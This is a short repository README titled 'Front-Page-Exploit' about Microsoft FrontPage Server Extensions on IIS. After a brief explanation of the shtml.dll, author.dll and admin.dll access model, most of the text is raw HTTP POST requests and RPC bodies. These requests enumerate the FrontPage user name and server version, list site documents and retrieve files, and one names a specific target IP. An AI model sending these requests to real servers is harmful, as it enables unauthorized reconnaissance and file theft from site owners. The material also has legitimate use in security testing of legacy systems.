└── README.md


/README.md:
--------------------------------------------------------------------------------
 1 | Front-Page-Exploit
 2 | ==================
 3 | 
 4 | On Windows NT and IIS, FrontPage security is basically controlled by the access rights to the three files Admin.dll, Author.dll, and Shtml.dll.  These rights respectively determine administration, authoring, and browsing rights.  For example, if a remote user is able to read and execute Admin.dll, then that user is able to administer the web site.
 5 |  
 6 | The authentication dll's are structured as follows:
 7 | Web Root
 8 |     \_vti_bin
 9 |      shtml.dll
10 |          \_vti_aut
11 |           author.dll
12 |          \_vti_adm
13 |           admin.dll
14 |  
15 | Request 1:
16 | POST /_vti_bin/shtml.dll/_vti_rpc HTTP/1.0
17 | Connection: Keep-Alive
18 | Date: Mon, 23 Mar 2003 00:00:15 GMT
19 | Accept: */*
20 | Host: 208.51.43.138
21 | User-Agent: MSFrontPage/4.0
22 | Content-Type: application/x-www-form-urlencoded
23 | MIME-Version: 1.0
24 | X-Vermeer-Content-Type: application/x-www-form-urlencoded
25 | Content-Length: 59
26 |  
27 | <method-1>
28 | method=open+service%3a3%2e0%2e2%2e1105&service%5fname=%2f    <===  Display the frontpage user name
29 |  
30 | <method-2>
31 | method=server+version%3a4%2e0%2e2%2e2611   <===  To identify server version
32 |  
33 | =========================================
34 |  
35 | Request 2:
36 | POST /_vti_bin/_vti_aut/author.dll HTTP/1.1
37 | MIME-Version: 1.0
38 | User-Agent: MSFrontPage/4.0
39 | Accept: auth/sicily
40 | Content-Length: 241
41 | Content-Type: application/x-www-form-urlencoded
42 | X-Vermeer-Content-Type: application/x-www-form-urlencoded
43 | Connection: Keep-Alive
44 | 
45 | <method-1>
46 | method=open+service%3a3%2e0%2e2%2e1706&service%5fname=%2f
47 | 
48 | <method-2>
49 | method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=false&listExplorerDocs=false&listRecurse=false&listFiles=true&listFolders=true&
50 | listLinkInfo=false&listIncludeParent=true&listDerivedT=false&listBorders=false&initialUrl= 
51 |  
52 | <method-3>
53 | To retreive a file, you send this as the POST data:
54 | method=get+document%3a3%2e0%2e2%2e1105&service%5fname=&document%5fname=about%2fdefault%2ehtm&old%5ftheme%5fhtml=false&force=true&
55 | get%5foption=none&doc%5fversion= 
56 | 
57 | Reference Link-
58 | http://grox.net/doc/web/frontpage/security.htm
59 | http://sourceforge.net/apps/trac/w3af/ticket/145813
60 | 


--------------------------------------------------------------------------------